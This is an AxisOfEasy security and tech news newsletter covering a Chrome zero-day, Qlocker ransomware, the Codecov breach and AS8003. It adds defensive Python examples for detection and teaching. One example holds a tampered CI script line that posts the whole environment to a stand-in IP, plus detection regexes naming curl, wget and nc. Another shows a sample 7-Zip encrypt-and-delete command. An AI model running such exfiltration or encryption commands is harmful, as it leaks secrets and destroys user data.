#AxisOfEasy 193: Gigantic Mystery Block Of Military IP Addresses Became Active On Inauguration Day


Weekly Axis Of Easy #193


Last Week’s Quote was  “A nation of sheep will beget a government of wolves.” … Edward R. Murrow, speaking on the rabid McCarthyism of his day.  Winner was Rai Henderson

This Week’s Quote:  “Most of the greatest evils that man has inflicted upon man have come through people feeling quite certain about something which, in fact, was false”… by???

THE RULES: No searching up the answer, must be posted to the blog – the place to post the answer is at the bottom of the post, in the comments section.

The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.

 


In this issue:
  • Another Yet Another Chrome Zero-Day
  • Bad auditing software sent UK postal workers to prison
  • USPO running cyber-surveillance operation on social media posts
  • Cyber security legend Dan Kaminsky has died
  • Gigantic mystery block of military IP addresses became active in January
  • Parler is back on the Apple store
  • New bill will ban government from buying location data
  • Ransomware is targeting QNAP devices
  • Victim companies begin to emerge in Codecov supply chain hack
  • Salon 42: Is systems change inevitable?
 
 
Another Yet Another Chrome Zero-Day

Here we go again: stop what you’re doing, go check your Google Chrome and Chromium-based browsers (this includes Brave and Microsoft Edge) and make sure you’re on the latest version. For Chrome that is 90.0.4430.85. Brave and Edge carry their own product version numbers, so on those the number to compare is the Chromium build they report (brave://version shows it next to “Chromium:”, and in Edge it appears as “Chrome/x.y.z.w” in the user-agent string on edge://version), not the vendor’s product version.

This addresses the newest Chrome 0-day flaw, which is described simply as a “type confusion” vulnerability (in the V8 JavaScript engine) but is known to have exploits circulating for it in the wild. It has been assigned CVE-2021-21224.

Read:  https://www.securityweek.com/google-chrome-hit-another-mysterious-zero-day-attack

If this keeps up I’m going to have to call the next one “Another Another Yet Another Chrome 0-day.”
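A version check to go with the advice above, as an added example of mine (not Google’s, Brave’s or Microsoft’s code). It pulls the version out of the line a browser reports and compares it numerically against the Chrome build that carries the fix. The sample strings are constructed to mirror the shape of chrome://version, brave://version and a Chromium user-agent string; the pitfall it guards against is lexical string comparison, which would rank 90.0.4430.9 above 90.0.4430.85.

```python
import re

# Chrome build that carries the fix for CVE-2021-21224 (from the newsletter).
FIXED_CHROME_VERSION = "90.0.4430.85"

_FOUR_PART = r"(\d+(?:\.\d+){3})"
_ANY_VERSION = re.compile(r"\b" + _FOUR_PART + r"\b")
# Brave prints "Chromium: x.y.z.w"; every Chromium derivative's user agent
# carries "Chrome/x.y.z.w". Either is the number to compare, never the
# vendor's own product version (e.g. Brave 1.23.73, Edge 90.0.818.49).
_CHROMIUM_BASE = re.compile(r"(?:Chromium:\s*|Chrome/)" + _FOUR_PART)


def parse_version(text: str) -> tuple:
    """First 4-part dotted version in `text`, as a tuple of ints.

    Tuples compare numerically; strings do not: "90.0.4430.9" > "90.0.4430.85"
    as strings although it is the older build.
    """
    m = _ANY_VERSION.search(text)
    if not m:
        raise ValueError(f"no 4-part version in {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def chromium_version(version_line: str) -> tuple:
    """Chromium build a browser is based on, from its about:version line or UA."""
    m = _CHROMIUM_BASE.search(version_line)
    if m:
        return tuple(int(p) for p in m.group(1).split("."))
    return parse_version(version_line)   # plain Chrome: the only version shown


def is_patched(version_line: str, fixed: str = FIXED_CHROME_VERSION) -> bool:
    """True when the reported Chromium build is at or past the fixed build."""
    return chromium_version(version_line) >= parse_version(fixed)


if __name__ == "__main__":
    # Constructed strings in the shape of what the browsers report.
    for line in (
        "Google Chrome 90.0.4430.85 (Official Build) (64-bit)",
        "Google Chrome 90.0.4430.72 (Official Build) (64-bit)",
        "Brave 1.23.73 Chromium: 90.0.4430.85 (Official Build) (64-bit)",
        "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.49",
    ):
        print("patched" if is_patched(line) else "VULNERABLE", "-", line)
```

The same comparison applies to any later Chromium zero-day: change `FIXED_CHROME_VERSION` and feed it whatever your endpoint inventory reports.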



Bad auditing software sent UK postal workers to prison

In 1999 the UK post office installed an accounting auditing system called “Horizon,” by Fujitsu. It’s used to track the funds flow and transactions through the national postal system.

It had a “bug,” however: it kept indicating that funds were going missing, and that resulted in the criminal prosecution of over 700 UK sub-postmasters (and sub-postmistresses). Some of these people were actually sentenced to prison.

Turns out, the software was buggy and wrong, but nobody up the chain of command wanted to admit it. In multiple instances sub-postmasters would even fill in the missing funds with their own money, in a desperate attempt to ward off prosecution. One of them even mortgaged his house to come up with the “missing” funds.

One woman was sent to prison whilst pregnant, another man committed suicide.

A court case in 2019 awarded 55M pounds to over 500 claimants (whose share of the payout after legal fees was… 12M). The judge on the case found that the innumerable shortfalls in funds were caused by the system itself.

The latest chapter in all this, and the reason it’s in the news again now, is that a UK court of appeal has overturned 39 of those convictions.

Read: https://www.bbc.com/news/business-56718036

And: https://www.theverge.com/2021/4/23/22399721/uk-post-office-software-bug-criminal-convictions-overturned


USPO running cyber-surveillance operation on social media posts

Meanwhile, the US postal service is up to something altogether different: running a covert surveillance program against citizens’ social media activities and sharing their findings with other US government agencies.

These activities are part of an undisclosed program being carried out by the US Postal Inspections Service (USPIS) called the “Internet Covert Operations Program” or iCOP.

A report obtained by Yahoo News was circulated as “law enforcement sensitive” to agencies such as the Department of Homeland Security focusing on the World Wide Rally for Freedom and Democracy protests planned for March 20th.

USPIS agents took screen captures and postings from platforms such as Parler and Telegram which purportedly threatened to incite violence at said events. The report also noted that “No intelligence is available to suggest the legitimacy of these threats” and the article notes that nothing in the screen captures obtained suggests as much, although one of the authors of a post therein was purportedly a member of The Proud Boys.
 
Read: https://news.yahoo.com/the-postal-service-is-running-a-running-a-covert-operations-program-that-monitors-americans-social-media-posts-160022919.html


Cyber security legend Dan Kaminsky has died

Sad news in the world of computer security when the news emerged on Saturday April 24th that Dan Kaminsky, a prolific cyber-security researcher, had died. Kaminsky was known for working in secret with DNS vendors in 2008 to address a DNS cache poisoning flaw. While the class of flaw was known to exist as early as 1999 (djbdns’ Dan Bernstein had already built his resolver to defend against it), Kaminsky figured out a way to exploit it reliably against BIND and the other resolvers of the day: because an attacker can make a resolver look up an unlimited number of fresh names under a target domain, the attacker can keep re-running the 16-bit transaction-ID guessing race until it wins. It was because of this discovery that source port randomization was rolled out across the major resolvers, adding roughly another 16 bits the attacker has to guess.

He went on to discover numerous other flaws, including flaws in the SSL protocol, and developed a methodology.

A later tweet from his niece attributed his cause-of-death to complications arising from his longtime battle with diabetes.

Read: https://www.circleid.com/posts/20210424-security-researcher-dan-kaminsky-has-died
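To make concrete why source port randomization was the fix, here is an added example of mine (not Kaminsky’s code, nor any resolver’s): a model of the 2008 poisoning race. The assumptions are mine: a forged reply is accepted if it matches the 16-bit transaction ID and the UDP port of the outstanding query, forged replies beat the genuine one to the resolver, and each forged reply carries a distinct guess; bandwidth limits, TTL windows and other defences are ignored.

```python
import random

TXID_BITS = 16   # DNS transaction ID width
PORT_BITS = 16   # extra entropy once the resolver randomizes its source port


def per_query_success(distinct_guesses, entropy_bits):
    """Probability that one outstanding query is poisoned when the attacker
    lands `distinct_guesses` forged replies, each carrying a different guess
    of the (txid[, port]) the resolver is waiting for."""
    space = 1 << entropy_bits
    return min(distinct_guesses, space) / space


def expected_queries_to_poison(distinct_guesses, entropy_bits):
    """Kaminsky's insight: the attacker can trigger a brand-new query
    (<nonce>.victim.example) after every miss, so a lost race costs nothing
    but time. This is the mean number of such races needed to win once."""
    p = per_query_success(distinct_guesses, entropy_bits)
    return float("inf") if p == 0 else 1.0 / p


def simulate(trials, guesses, txid_bits=TXID_BITS, port_bits=0, seed=0):
    """Monte Carlo of the same race: fraction of queries that get poisoned.

    With port_bits=0 the resolver uses a fixed source port (pre-2008
    behaviour); with port_bits=16 it draws a fresh port per query.
    """
    rng = random.Random(seed)
    space = 1 << (txid_bits + port_bits)
    poisoned = 0
    for _ in range(trials):
        secret = rng.randrange(space)                   # resolver's (txid, port)
        forged = rng.sample(range(space), min(guesses, space))  # attacker's guesses
        if secret in forged:
            poisoned += 1
    return poisoned / trials


if __name__ == "__main__":
    for bits, label in ((TXID_BITS, "fixed source port"),
                        (TXID_BITS + PORT_BITS, "random source port")):
        print(f"{label}: P(win per query, 1000 forged replies) = "
              f"{per_query_success(1000, bits):.6f}, "
              f"expected races = {expected_queries_to_poison(1000, bits):,.0f}")
```

With a fixed port and a thousand forged replies per race the attacker wins roughly one race in 66; with a random port the same effort needs on the order of four million races, which is why the 2008 patch turned a minutes-long attack into an impractical one without touching the protocol.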


Gigantic mystery block of military IP addresses became active in January

This was noticed on the NANOG mailing list a few weeks ago and then reported on in the mainstream press over the weekend, and it’s now taking on an air of mystery. An absolutely huge swath of IPv4 address space (basically the entire 11.0.0.0/8 netblock, plus others) had been assigned to the US Department of Defence decades ago and sat dormant ever since. It wasn’t even being routed anywhere.

Then, on Inauguration Day in the US (and the timing is being made a focus), the space was placed with an obscure entity called Global Resource Systems, which operates out of a virtual office in a nondescript Florida business park, and it began being announced via BGP from that entity’s autonomous system, AS8003.

On the day this happened AS8003 was originating 56 million IP addresses, which already made it the 6th largest Autonomous System (AS) in the global routing table by address count, and it has only been getting bigger since January: it now originates 175M addresses and is the biggest AS in the world by that measure, larger than the second biggest, China Telecom, and over 100M addresses ahead of the next largest US network, Comcast. As of a few days ago, AS8003 is originating nearly 6% of all the IPv4 address space routed on the Internet (a share of addresses, not of prefixes in the table).

If you can imagine me saying this with that really annoying newscaster cadence and timbre… “What is it? Why has it happened, and to what end? We may never know. Stay tuned…”

Read: https://www.kentik.com/blog/the-mystery-of-as8003/

And: https://www.washingtonpost.com/technology/2021/04/24/pentagon-internet-address-mystery/
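The numbers above come from counting announced address space per origin AS, which is less trivial than it sounds because a routing table holds overlapping prefixes: a /8 and a /16 inside it must count once. The following is an added example of mine, not Kentik’s code or data. It does that count over a constructed snapshot of (prefix, origin ASN) pairs, reports each AS’s share of the routed space in that snapshot, and lists prefixes absent from an earlier snapshot, which is how an idle /8 coming alive shows up. AS64496 and AS64497 are documentation ASNs and 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges; 22.0.0.0/8 stands in for one of the “others” and is an assumption.

```python
import ipaddress
from collections import defaultdict

# Constructed sample snapshots of (prefix, origin ASN); not real table data.
BEFORE = [
    ("203.0.113.0/24", 64496),
    ("198.51.100.0/24", 64496),
]
AFTER = [
    ("11.0.0.0/8", 8003),
    ("11.0.0.0/16", 8003),        # more-specific of the /8: must not double count
    ("22.0.0.0/8", 8003),         # assumed placeholder for one of the other blocks
    ("203.0.113.0/24", 64496),
    ("198.51.100.0/24", 64496),
    ("198.51.100.0/25", 64497),   # more-specific originated by a different AS
]


def _networks(prefixes):
    return [ipaddress.ip_network(p, strict=True) for p in prefixes]


def addresses_by_origin(routes):
    """Map origin ASN -> number of distinct IPv4 addresses it originates.

    collapse_addresses() merges adjacent prefixes and drops ones already
    covered by a supernet, so overlapping announcements are counted once.
    """
    by_asn = defaultdict(list)
    for prefix, asn in routes:
        by_asn[asn].append(ipaddress.ip_network(prefix, strict=True))
    return {
        asn: sum(n.num_addresses for n in ipaddress.collapse_addresses(nets))
        for asn, nets in by_asn.items()
    }


def total_routed(routes):
    """Distinct addresses covered by the whole table, regardless of origin."""
    nets = _networks(p for p, _ in routes)
    return sum(n.num_addresses for n in ipaddress.collapse_addresses(nets))


def share_of_routed(routes, asn):
    """Fraction of the routed space in this snapshot originated by `asn`."""
    return addresses_by_origin(routes).get(asn, 0) / total_routed(routes)


def ranked_origins(routes):
    """Origin ASNs ordered by announced address count, largest first."""
    counts = addresses_by_origin(routes)
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)


def newly_announced(before, after):
    """Prefixes present in `after` but absent from `before`, with origin."""
    seen = {p for p, _ in before}
    return [(p, asn) for p, asn in after if p not in seen]


if __name__ == "__main__":
    for asn, count in ranked_origins(AFTER):
        print(f"AS{asn}: {count:,} addresses "
              f"({share_of_routed(AFTER, asn):.2%} of routed space)")
    print("new since last snapshot:", newly_announced(BEFORE, AFTER))
```

Run against a real table dump (RouteViews or RIPE RIS export, one prefix and origin per row) the same functions reproduce the “largest AS by address count” ranking the articles describe; comparing two dumps a day apart is the cheapest alert for a never-before-seen /8 appearing.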


Parler is back on the Apple store

Apple has announced it’s going to allow Parler back into the App Store, citing improved moderation capabilities in the alternative social media platform. Parler was kicked out of the Apple and Google Play stores in the wake of the Washington DC riots on January 6th, being accused of helping organize the fracas. Amazon AWS also deplatformed the app’s underlying cloud infrastructure.

Then-CEO John Matze was fired about a month later, was then stripped of his founder shares, and is now suing the company. He has been replaced by Mark Meckler. Meckler, a veteran of the Tea Party Patriots movement, was obviously chosen to placate the progressives.

Read: https://9to5mac.com/2021/04/19/parler-app-store-latest-version-approved/

Just logged in to check if my account is still there, it is, I’m @markjr on Parler if anybody hangs out there. I’m also @stuntpope on Twitter, and on Mastodon.


New bill will ban government from buying location data

US Senator Ron Wyden (D-OR) is at it again, introducing a bipartisan bill with Rand Paul (R-KY) called “The Fourth Amendment is Not For Sale Act” which would bar government and law enforcement agencies from buying location data about US citizens from private data brokers without a court order or a warrant.

We’ve reported previously on how US law enforcement agencies can skirt the need to obtain a warrant for location data from telcos by simply buying the same data from the many third-party data brokers that make up the surveillance capitalism economy.

Under this bill, all that would end:

“Doing business online doesn’t amount to giving the government permission to track your every movement or rifle through the most personal details of your life,” Wyden said in a statement. “There’s no reason information scavenged by data brokers should be treated differently than the same data held by your phone company or email provider. This bill closes that legal loophole and ensures that the government can’t use its credit card to end-run the Fourth Amendment.”

Read: https://www.washingtonexaminer.com/news/bipartisan-senators-call-ban-law-enforcement-buying-user-location-data

Interesting to note that when I searched via Google to find the issue number of that previous AoE issue where we reported on this, I got an ad to buy location data from a place called narrative.io, which seems to be a multi-sided platform for both buying and selling personal and location data…
 
 
Ransomware is targeting QNAP devices

There is a Qlocker ransomware strain that is specifically targeting QNAP NAS devices. I know a lot of customers here use those for file servers, backups and general storage, especially over on Zoneedit, which had native QNAP support for years before we acquired it.

This campaign began hitting QNAPs on April 9th and works by running the 7-Zip command line tool on the device, moving all the files into password-protected 7z archives. A ransom note is left behind in a “README” file that directs the victim to a payment site on a .onion address, where they have to pay 0.01 BTC (about $500+ USD right now) for the archive password.

Read: https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/
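Detection logic for the behaviour described above, as an added example of mine (not QNAP’s or BleepingComputer’s code). The 7-Zip command line takes the archive password as `-p<password>` and `-sdel` deletes the source files after adding them, so a process that is archiving user data with a password and deleting the originals is either a very unusual backup job or an encryptor in progress; because the password sits in the command line, a running encryptor also shows its key to anyone who can list processes. The process listing below is constructed for the example, and the field layout (pid, user, args) is an assumption.

```python
import shlex
from os.path import basename

SEVENZIP_BINARIES = {"7z", "7za", "7zr", "7zz"}

# Constructed process listing in the shape of `ps -eo pid,user,args`.
SAMPLE_PS = """\
  412 admin    /sbin/cron
 2209 admin    7z a -mx=0 -sdel -pH3llo_w0rld /share/CACHEDEV1_DATA/Public/invoice.7z /share/CACHEDEV1_DATA/Public/invoice.pdf
 2210 admin    /usr/local/bin/7z a /share/Backups/weekly.7z /share/Public/docs
 2300 httpdusr /usr/local/apache/bin/apache
"""


def analyze_7z_command(argv):
    """Describe a 7-Zip 'add to archive' command; None for anything else."""
    if not argv or basename(argv[0]) not in SEVENZIP_BINARIES:
        return None
    if len(argv) < 2 or argv[1] != "a":        # only archive creation matters here
        return None
    switches = [t for t in argv[2:] if t.startswith("-")]
    operands = [t for t in argv[2:] if not t.startswith("-")]
    password = next((s[2:] for s in switches if s.startswith("-p") and len(s) > 2), None)
    return {
        "archive": operands[0] if operands else None,
        "sources": operands[1:],
        "password": password,                      # recoverable while it runs
        "deletes_sources": "-sdel" in switches,
        "encrypts_headers": any(s.startswith("-mhe") for s in switches),
    }


def severity(finding):
    """Encrypt-and-delete is the ransomware pattern; a password alone is odd."""
    if finding["password"] and finding["deletes_sources"]:
        return "high"
    if finding["password"]:
        return "medium"
    return "info"


def scan_process_listing(ps_text):
    """Return one finding per 7-Zip archive-creation process in the listing."""
    findings = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmdline = parts
        try:
            argv = shlex.split(cmdline)
        except ValueError:                          # unbalanced quotes: skip line
            continue
        finding = analyze_7z_command(argv)
        if finding:
            finding.update(pid=int(pid), user=user, severity=severity(finding))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_process_listing(SAMPLE_PS):
        print(f"[{f['severity']}] pid {f['pid']} ({f['user']}): archive={f['archive']} "
              f"password={f['password']!r} deletes_sources={f['deletes_sources']}")
```

On a NAS this would be run from a cron job or a monitoring agent over the live process table; a “high” finding is the moment to kill the process and record the password, since the same password is what the attacker later sells back.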


Victim companies begin to emerge in Codecov supply chain hack

And the extent of last week’s supply chain hack against Codecov is starting to become known, as companies are revealed to have been compromised via the attack.

HashiCorp has disclosed a breach via the Codecov compromise, and in the same week the Passwordstate password manager disclosed a supply chain breach of its own.

The Passwordstate one looks pretty bad, given that people use it to store their passwords for everything else. In that case it was the product’s own in-place upgrade mechanism that was subverted to deliver a malicious build (a separate attack, not the Codecov uploader), and anybody who upgraded during the affected window is being advised to reset everything, all stored passwords. HashiCorp, for their part, who make infrastructure tooling such as Terraform and Vault, had the private GPG key used to sign and verify their release downloads exposed, and have rotated it.

This is probably just the tip of the iceberg and will be a slow motion train wreck, à la Solarwinds, for weeks to come.

Read: https://www.bleepingcomputer.com/news/security/hashicorp-is-the-latest-victim-of-codecov-supply-chain-attack/

And: https://www.bleepingcomputer.com/news/security/passwordstate-password-manager-hacked-in-supply-chain-attack/
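The Codecov attack worked because CI jobs fetched and executed a helper script straight from the vendor’s web server, so a tampered copy ran with every secret in the job’s environment. As an added example (mine, not Codecov’s, HashiCorp’s or Click Studios’ code), here is the check a pipeline should make before running such a script, together with a heuristic scan for the behaviour that makes the attack damaging: dumping the whole environment to a remote host. The script bodies are constructed stand-ins, the pinned digest is computed from the clean stand-in, and the regexes are my assumptions about what an exfiltration line looks like.

```python
import hashlib
import hmac
import re

# Constructed stand-in for a vendor helper script fetched at build time.
CLEAN_SCRIPT = b"""#!/usr/bin/env bash
set -euo pipefail
echo "uploading coverage report"
curl -s -X POST --data-binary @coverage.xml https://coverage.example/upload
"""

# Same script with one line spliced in: dump the environment and post it
# to an address that is not the vendor's (203.0.113.7 is a documentation IP).
TAMPERED_SCRIPT = CLEAN_SCRIPT.replace(
    b'echo "uploading coverage report"\n',
    b'echo "uploading coverage report"\n'
    b'curl -sm 0.5 -d "$(env)" http://203.0.113.7/upload || true\n',
)

# The digest you would vendor into CI config and bump deliberately on upgrade.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT).hexdigest()


def verify_script(body: bytes, expected_sha256: str) -> bool:
    """Compare the fetched body's SHA-256 against the pin in constant time."""
    digest = hashlib.sha256(body).hexdigest()
    return hmac.compare_digest(digest, expected_sha256)


# A line that both reads the whole environment and hands it to a network client.
_ENV_DUMP = re.compile(r"\$\(\s*(env|printenv|set)\s*\)|\benv\b\s*\||\bprintenv\b")
_NET_CLIENT = re.compile(r"\b(curl|wget|nc|ncat|python[23]?\s+-c)\b")


def suspicious_lines(body: bytes):
    """(line number, text) for lines that look like environment exfiltration."""
    hits = []
    for n, line in enumerate(body.decode("utf-8", "replace").splitlines(), 1):
        if _ENV_DUMP.search(line) and _NET_CLIENT.search(line):
            hits.append((n, line.strip()))
    return hits


def safe_to_run(body: bytes, expected_sha256: str) -> bool:
    """Gate for `bash <(curl ...)`-style steps: pin must match, scan must be clean."""
    return verify_script(body, expected_sha256) and not suspicious_lines(body)


if __name__ == "__main__":
    for name, body in (("clean", CLEAN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, "pin ok:", verify_script(body, PINNED_SHA256),
              "flagged:", suspicious_lines(body))
```

The pin is the real control: the scan is a tripwire that catches the obvious pattern but not an attacker who base64-encodes the environment first. Vendoring the script into the repository, or pinning its hash, turns a silent server-side swap into a failed build.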


Salon 42: Is systems change inevitable?

We had to skip a salon that was scheduled for the prior week (DDoS attacks against URL forwarding), so Charles, Jesse and I reconvened last week to explore whether some kind of complete system change is inevitable, desirable or even possible, which ties together a few themes each of us has been exploring recently:

 
View: https://axisofeasy.com/podcast/salon-42-is-system-change-likely-possible-or-inevitable/
